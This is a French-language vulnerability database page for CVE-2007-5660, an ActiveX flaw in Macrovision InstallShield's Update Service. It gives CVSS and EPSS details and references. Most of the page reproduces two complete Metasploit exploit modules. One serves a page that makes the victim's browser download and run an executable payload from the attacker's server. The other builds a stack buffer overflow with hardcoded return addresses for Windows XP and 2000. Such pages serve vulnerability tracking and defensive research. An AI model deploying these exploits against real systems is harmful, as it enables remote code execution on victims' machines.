CVE-2007-5660 : Détail

CVE-2007-5660

67.69%V4
Network
2007-11-02
15h00 +00:00
2017-07-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the Update Service ActiveX control in isusweb.dll before 6.0.100.65101 in MacroVision FLEXnet Connect and InstallShield 2008 allows remote attackers to execute arbitrary code via an unspecified "unsafe method," possibly involving a buffer overflow.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16602

Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: macrovision_unsafe.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service ActiveX Unsafe Method', 'Description' => %q{ This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2007-5660' ], [ 'OSVDB', '38347' ], [ 'BID', '26280' ], ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2007')) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end vname = rand_text_alpha(rand(100) + 1) exe = rand_text_alpha(rand(20) + 1) content = %Q| <html> <object classid='clsid:E9880553-B8A7-4960-A668-95C68BED571E' id='#{vname}'></object> <script language='JavaScript'> #{vname}.Initialize("#{vname}","#{vname}","",""); #{vname}.DownloadAndExecute("","",1,"#{payload_url}/#{exe}.exe",""); #{vname}.DownloadAndInstall("True"); </script> </html> | content = Rex::Text.randomize_space(content) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end end
Exploit Database EDB-ID : 16573

Date de publication : 2010-05-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: macrovision_downloadandexecute.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Macrovision InstallShield Update Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to the DownloadAndExecute method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2007-5660' ], [ 'OSVDB', '38347' ], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 600, 'Ret' => 0x71aa32ad } ], [ 'Windows 2000 Pro English All', { 'Offset' => 600, 'Ret' => 0x75022ac4 } ], ], 'DisclosureDate' => 'Oct 31 2007', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) # Set the exploit buffer sploit = rand_text_alpha(target['Offset']) sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') sploit << p.encoded + rand_text_alpha(1200 - p.encoded.length) #[id(0x00000007), helpstring("method DownloadAndExecute")] #void DownloadAndExecute( # BSTR dispname, # BSTR ProductCode, # long MsgID, # BSTR url, # BSTR cmdline); # Build out the message content = %Q| <html> <object classid='clsid:E9880553-B8A7-4960-A668-95C68BED571E' id='#{vname}'></object> <script language='javascript'> #{strname} = new String('#{sploit}') #{vname}.DownloadAndExecute("", #{strname}, 0, "", ""); </script> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

Products Mentioned

Configuraton 0

Macrovision>>Flexnet_connect >> Version *

Macrovision>>Installshield_2008 >> Version *

    Macrovision>>Update_service >> Version 3.0

      Macrovision>>Update_service >> Version 4.0

        Macrovision>>Update_service >> Version 5.0

          Macrovision>>Update_service >> Version 5.1.100_47363

            Macrovision>>Update_service >> Version 6.0.100_60146

              Références

              http://secunia.com/advisories/27475
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=618
              Tags : third-party-advisory, x_refsource_IDEFENSE
              http://osvdb.org/38347
              Tags : vdb-entry, x_refsource_OSVDB
              http://www.vupen.com/english/advisories/2007/3670
              Tags : vdb-entry, x_refsource_VUPEN
              http://www.securitytracker.com/id?1018881
              Tags : vdb-entry, x_refsource_SECTRACK
              http://www.securityfocus.com/bid/26280
              Tags : vdb-entry, x_refsource_BID